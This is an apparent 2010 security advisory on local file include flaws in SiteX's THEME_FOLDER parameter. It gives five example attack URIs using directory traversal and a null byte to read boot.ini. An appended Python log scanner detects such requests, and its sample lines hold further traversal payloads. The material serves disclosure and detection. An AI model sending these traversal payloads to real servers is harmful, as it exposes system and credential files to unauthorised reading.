SiteX 'THEME_FOLDER' Parameter Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/path/themes/Corporate/homepage.php?THEME_FOLDER=../../../boot.ini%00
http://www.example.com/path/themes/Fusion/homepage.php?THEME_FOLDER=../../../boot.ini%00
http://www.example.com/path/themes/Joombo/homepage.php?THEME_FOLDER=../../../boot.ini%00
http://www.example.com/path/themes/Streamline/homepage.php?THEME_FOLDER=../../../boot.ini%00
http://www.example.com/path/themes/Structure/homepage.php?THEME_FOLDER=../../../boot.ini%00
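
Added example (not part of the original advisory): a Python check that scans web server access logs for requests shaped like the URIs above, where THEME_FOLDER carries directory traversal, a null byte, or an absolute path. The combined log format, the sample log lines, and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] "GET /path/themes/Corporate/homepage.php?THEME_FOLDER=../../../boot.ini%00 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2010:10:00:05 +0000] "GET /path/themes/Fusion/homepage.php?THEME_FOLDER=%252e%252e%252fconfig HTTP/1.1" 200 128',
    '192.0.2.9 - - [01/Jan/2010:10:00:09 +0000] "GET /path/themes/Fusion/homepage.php?THEME_FOLDER=Fusion HTTP/1.1" 200 900',
    '192.0.2.9 - - [01/Jan/2010:10:00:12 +0000] "GET /path/index.php HTTP/1.1" 200 4096',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def theme_folder_findings(value):
    """Return the reasons a THEME_FOLDER value looks like a file-include attempt."""
    v = fully_decode(value).replace("\\", "/")
    reasons = []
    if "\x00" in v:  # %00 truncates the suffix appended by the include
        reasons.append("null-byte")
    if ".." in v.replace("\x00", "").split("/"):
        reasons.append("traversal")
    if re.match(r"(/|[A-Za-z]:)", v):
        reasons.append("absolute-path")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for each log line with a suspicious THEME_FOLDER."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        url = urlsplit(m.group(1))
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            reasons = theme_folder_findings(val) if key == "THEME_FOLDER" else []
            if reasons:
                hits.append((n, reasons))
    return hits
```

Calling scan(SAMPLE_LOG) flags the first two constructed lines and leaves the two benign ones alone; on the application side, the matching control is to resolve the theme directory from a fixed allow-list rather than from request input.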


 

Copyright 2010, SecurityFocus